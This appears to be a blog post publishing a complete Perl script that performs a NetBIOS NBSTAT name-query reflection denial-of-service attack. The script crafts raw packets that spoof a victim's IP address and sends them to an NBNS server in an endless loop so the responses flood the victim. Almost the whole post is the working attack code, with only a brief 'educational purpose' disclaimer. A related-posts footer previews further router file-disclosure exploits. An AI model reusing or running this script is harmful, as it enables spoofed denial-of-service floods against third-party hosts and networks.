Microsoft NetBIOS ‘NBSTAT Name’ Query Reflection Denial Of Service

Microsoft NetBIOS ‘NBSTAT Name’ Query Reflection Denial Of Service

Posted by ethical-hacker | Monday December 5th, 2016 | Vulnerabilities
#!/usr/bin/perl
#
#  NetBios NBSTAT name query reflection dos
#
#  Copyright 2015 (c) Todor Donev 
#  [email protected]
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  Disclaimer:
#  This or previous program is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#
#  Use at your own risk and educational 
#  purpose ONLY!
#
#  See also, UDP-based Amplification Attacks:
#  https://www.us-cert.gov/ncas/alerts/TA14-017A
#  http://www.rhyshaden.com/netbios.htm
#

use strict;
use Socket;
use warnings;
no warnings 'uninitialized';

if ( $< != 0 ) {
   print "Sorry, must be run as root!\n";
   print "This script use RAW Socket.\n"; 
   exit;
}

my $nbns            = (gethostbyname($ARGV[0]))[4];         # IP Address Destination        (32 bits)
my $victim          = (gethostbyname($ARGV[1]))[4];         # IP Address Source             (32 bits)

print "[ NetBios NBSTAT name query reflection ddos\n";
if (!defined $nbns || !defined $victim) {
    print "[ Usg: $0 <nbns src> <victim>\n";
    print "[ <todor.donev\@gmail.com> Todor Donev\n";
    exit;
}
print "[ Sending NBNS packets: $ARGV[0] -> $ARGV[1]\n";
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
setsockopt(RAW, 0, 1, 1) or die $!;
main();

    # Main program
sub main {
    my $packet;
    
    $packet = iphdr();
    $packet .= udphdr();
    $packet .= nbnshdr();
    # b000000m...
    send_packet($packet);
}

    # IP header (Layer 3)
sub iphdr {
    my $ip_ver           = 4;          # IP Version 4      (4 bits)
    my $iphdr_len        = 5;          # IP Header Length    (4 bits)
    my $ip_tos           = 0;          # Differentiated Services  (8 bits)
    my $ip_total_len     = $iphdr_len + 20;      # IP Header Length + Data  (16 bits)
    my $ip_frag_id       = 0;          # Identification Field    (16 bits)
    my $ip_frag_flag     = 000;          # IP Frag Flags (R DF MF)  (3 bits)
    my $ip_frag_offset   = 0000000000000;      # IP Fragment Offset    (13 bits)
    my $ip_ttl           = 255;          # IP TTL      (8 bits)
    my $ip_proto         = 17;          # IP Protocol      (8 bits)
    my $ip_checksum      = 0;          # IP Checksum      (16 bits)

    # IP Packet
  my $iphdr  = pack(
      'H2 H2 n n B16 h2 c n a4 a4',
      $ip_ver . $iphdr_len, $ip_tos, 
      $ip_total_len, $ip_frag_id, 
      $ip_frag_flag . $ip_frag_offset,
      $ip_ttl, $ip_proto, $ip_checksum,
      $victim, $nbns
      );
      return $iphdr;
}

    # UDP Header (Layer 4)
sub udphdr {
    my $udp_src_port  = 31337;      # UDP Sort Port    (16 bits) (0-65535)
    my $udp_dst_port  = 137;        # UDP Dest Port    (16 btis) (0-65535)
    my $udp_len    = 8 + length(nbnshdr());  # UDP Length    (16 bits) (0-65535)
    my $udp_checksum   = 0;        # UDP Checksum    (16 bits) (XOR of header)

    # UDP Packet
    my $udphdr    = pack(
      'n n n n',
      $udp_src_port, 
      $udp_dst_port,
      $udp_len, 
      $udp_checksum
      );
  return $udphdr;
}

    # NetBios Name Service
sub nbnshdr {

    my $transid     = 0x03e8;
    my $namequery   = 0x0010;
    my $questions   = 0x0001;
    my $answerrr   = 0x0000;    
    my $authrr     = 0x0000;
    my $adrr     = 0x0000;
    
    my $query     = "\x20\x43\x4b\x41\x41\x41\x41\x41\x41\x41\x41";
       $query    .= "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
       $query    .= "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00";
        
    my $type    = 0x0021;    
    my $class    = 0x0001;

    # NetBios packet
    my $nbnshdr    = pack(
                        'n n n n n n a* n n', 
       $transid,
                         $namequery,
       $questions, 
       $answerrr,
                         $authrr,
                         $adrr,
                         $query,
                         $type,
                         $class
      );
return $nbnshdr;
}

sub send_packet {
    while(1){
    select(undef, undef, undef, 0.30);      # Sleep 300 milliseconds
    send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $nbns)) or die $!;
   }
}

Add a comment

Related Blogs

ethical hacker
Posted by ethical-hacker | 05 December 2016
#!/bin/sh # # D-Link ADSL ROUTER DSL-2750E SEA_1.07 # Remote File Disclosure # # Modem Name: DSL-2750E # Firmware Version: SEA_1.07 # # Copyright 2016 (c) Todor Donev # &amp;lt;todor.donev...
ethical hacker
Posted by ethical-hacker | 05 December 2016
#!/bin/sh # # NETGEAR ADSL ROUTER JNR2010 1.0.0.20 # Authenticated Remote File Disclosure # # Hardware Version: JNR2010 # Firmware Version: 1.0.0.20 # # Copyright 2016 (c) Todor Donev #...
ethical hacker
Posted by ethical-hacker | 05 December 2016
#!/bin/sh # # NETGEAR ADSL ROUTER JNR1010 1.0.0.32 # Authenticated Remote File Disclosure # # Hardware Version: JNR1010 # Firmware Version: 1.0.0.32 # # Copyright 2016 (c) Todor Donev #...